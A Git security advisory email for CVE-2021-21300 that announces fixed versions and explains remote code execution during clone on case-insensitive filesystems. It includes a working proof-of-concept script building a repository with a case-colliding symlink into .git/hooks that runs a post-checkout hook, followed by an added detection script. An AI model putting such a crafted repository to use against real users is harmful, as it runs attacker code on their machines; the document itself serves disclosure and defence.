Date: Tue, 9 Mar 2021 16:03:37 +0100 (CET)
From: Johannes Schindelin <[email protected]>
To: [email protected]
cc: [email protected], Matheus Tavares <[email protected]>
Subject: git: malicious repositories can execute remote code while cloning

Team,

The Git project released new versions on Tuesday, March 9th 2021
addressing CVE-2021-21300.

This vulnerability affects platforms with case-insensitive filesystems
with support for symbolic links, when certain clean/smudge filters are
configured globally (e.g. Git LFS).

The fixed versions are v2.17.6, v2.18.5, v2.19.6, v2.20.5, v2.21.4,
v2.22.5, v2.23.4, v2.24.4, v2.25.5, v2.26.3, v2.27.1, v2.28.1, v2.29.3,
and v2.30.2.

Link to the announcement:

    https://lore.kernel.org/git/[email protected]/T/#u

We highly recommend upgrading.

The addressed issue is:

* CVE-2021-21300:
  On case-insensitive filesystems, with support for symbolic links,
  if Git is configured globally to apply delay-capable clean/smudge
  filters (such as Git LFS), Git could be fooled into running
  remote code during a clone.

Demo exploit:
    #!/bin/sh

    git init delayed-checkout &&
    (
        cd delayed-checkout &&
        # A/post-checkout is routed through the delay-capable LFS filter
        echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
            >.gitattributes &&
        mkdir A &&
        printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
        chmod +x A/post-checkout &&
        git add -A &&
        rm -rf A &&
        # symlink "a" collides with directory "A" on case-insensitive filesystems
        ln -s .git/hooks a &&
        git add a &&
        git commit -m initial
    ) &&
    git clone delayed-checkout cloned

With Git LFS enabled globally, this will print "PWNED" during the clone
on case-insensitive file systems with support for symbolic links (such
as NTFS, HFS+, etc).

Credit for finding the vulnerability goes to Matheus Tavares who also
worked with me on fixing it.

Thanks,
Johannes
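
Added example, not part of the original message or the Git project's code: a shell function that reads `git ls-tree -r` output and reports symlink entries whose path matches, ignoring case, a leading directory of another tracked path, which is the tree layout the advisory describes. The function names and the sample object ids are constructed for illustration; it assumes ls-tree's default path quoting and whatever case folding awk's tolower provides (ASCII at minimum).

```shell
#!/bin/sh
# Added example (not from the advisory or the Git project).
# Reads `git ls-tree -r <commit>` output on stdin and prints, one per line,
#   <symlink path> TAB <a tracked path beneath the colliding directory>
# for every symlink whose path equals, ignoring case, a leading directory
# of another entry. NTFS and HFS+ also fold non-ASCII characters, which
# awk may not, so treat an empty result as "no ASCII-level collision".
find_case_collisions() {
    awk -F '\t' '
    {
        split($1, meta, " ")          # meta[1] is the mode; 120000 = symlink
        path = $2
        lower = tolower(path)
        if (meta[1] == "120000")
            links[lower] = path
        # Remember each leading directory of this path, case-folded.
        n = split(lower, parts, "/")
        dir = ""
        for (i = 1; i < n; i++) {
            if (i == 1) dir = parts[i]; else dir = dir "/" parts[i]
            if (!(dir in dirs))
                dirs[dir] = path
        }
    }
    END {
        for (l in links)
            if (l in dirs)
                printf "%s\t%s\n", links[l], dirs[l]
    }' | sort
}

# Constructed sample: the tree layout from the advisory with placeholder
# object ids, plus a harmless symlink and an unrelated file.
sample_tree() {
    printf '%s blob %s\t%s\n' \
        100644 1111111111111111111111111111111111111111 .gitattributes \
        100755 2222222222222222222222222222222222222222 A/post-checkout \
        120000 3333333333333333333333333333333333333333 a \
        120000 4444444444444444444444444444444444444444 docs \
        100644 5555555555555555555555555555555555555555 src/main.c
}

sample_tree | find_case_collisions
```

Run it as `git ls-tree -r HEAD | find_case_collisions` in a clone made with `git clone --no-checkout`, so nothing is written to the working tree before the check.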